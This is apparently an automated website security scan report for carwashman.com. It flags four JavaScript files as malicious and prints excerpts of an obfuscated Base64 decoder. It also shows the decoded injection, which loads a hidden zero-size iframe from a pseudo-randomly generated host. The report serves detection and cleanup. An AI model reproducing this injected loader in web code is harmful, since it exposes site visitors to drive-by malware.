Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=carwashman.com
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.carwashman.com/ | 200 OK Content-Length: 7013 Content-Type: text/html | clean |
http://www.carwashman.com/javascripts/jquery.js | 200 OK Content-Length: 108950 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt (truncated in the report):
function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2
The excerpt is a Base64 decoding routine under an apparently machine-generated name; the same routine is reported in each of the other flagged scripts on this site.
Antivirus reports:
http://www.carwashman.com/javascripts/jquery.superfish.js | 200 OK Content-Length: 9659 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt (truncated in the report):
function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2
Antivirus reports:
http://www.carwashman.com/javascripts/swfobject.js | 200 OK Content-Length: 21919 Content-Type: application/javascript | malicious |
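Malicious code - confirmed by antiviruses (see below). Excerpt (truncated in the report):
function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2
Decoded script (beginning and end only; the middle is elided in the report):
/** * SWFObject v1.5: Flash Player detection and embed - http://blog.deconcept.com/swfobject/ * * SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License: * http://www.opensource.org/licenses/mit-license.php * */ if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFO
[...]
var b = generatePseudoRandomString(a, 16, "ru"); ifrm = document.createElement("IFRAME"); ifrm.setAttribute("src", "http://" + b + "/runforestrun?sid=cxx"); ifrm.style.width = "0px"; ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 2000 */
The decoded output starts with the legitimate SWFObject library and ends with injected code: it builds a hostname with generatePseudoRandomString(a, 16, "ru") and loads http://<generated hostname>/runforestrun?sid=cxx in a hidden, zero-size iframe appended to the page body. Because the hostname is generated rather than fixed, blocking a single domain does not cover it; the /runforestrun?sid= request path and the decoder function present in the site's .js files are the more stable indicators to search for. The flagged files should be restored from a known-good copy rather than edited in place.
Antivirus reports: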
http://www.carwashman.com/javascripts/lib.js | 200 OK Content-Length: 12397 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Excerpt (truncated in the report):
function kzLIfOuzteVbhCEe(a){var b="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var c="";var d,chr2,chr3="";var e,enc2,enc3,enc4="";var i=0;a=a.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{e=b.indexOf(a.charAt(i++));enc2=b.indexOf(a.charAt(i++));enc3=b.indexOf(a.charAt(i++));enc4=b.indexOf(a.charAt(i++));d=(e<<2)|(enc2>>4);chr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;c=c+String.fromCharCode(d);if(enc3!=64){c=c+String.fromCharCode(chr2
Antivirus reports:
http://www.carwashman.com/durashiner.html | 200 OK Content-Length: 7231 Content-Type: text/html | clean |
http://www.carwashman.com/durashiner2.html | 200 OK Content-Length: 7223 Content-Type: text/html | clean |
http://www.carwashman.com/durashiner3.html | 200 OK Content-Length: 7223 Content-Type: text/html | clean |
http://www.carwashman.com/index.html | 200 OK Content-Length: 7013 Content-Type: text/html | clean |
http://www.carwashman.com/whyindy.html | 200 OK Content-Length: 6887 Content-Type: text/html | clean |
http://www.carwashman.com/whybelanger.html | 200 OK Content-Length: 6875 Content-Type: text/html | clean |
http://www.carwashman.com/videotour.html | 200 OK Content-Length: 7263 Content-Type: text/html | clean |
http://www.carwashman.com/videotour2.html | 200 OK Content-Length: 7255 Content-Type: text/html | clean |
http://www.carwashman.com/videotour3.html | 200 OK Content-Length: 7255 Content-Type: text/html | clean |
http://www.carwashman.com/videotour4.html | 200 OK Content-Length: 7285 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: carwashman.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: carwashman.com
Referer: http://www.google.com/search?q=carwashman.com
Result:
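The result is similar to the first query. No suspicious redirects were found. This check appears to compare server responses only; the hidden iframe added by the flagged scripts is created client-side by JavaScript and would not show up as a redirect here.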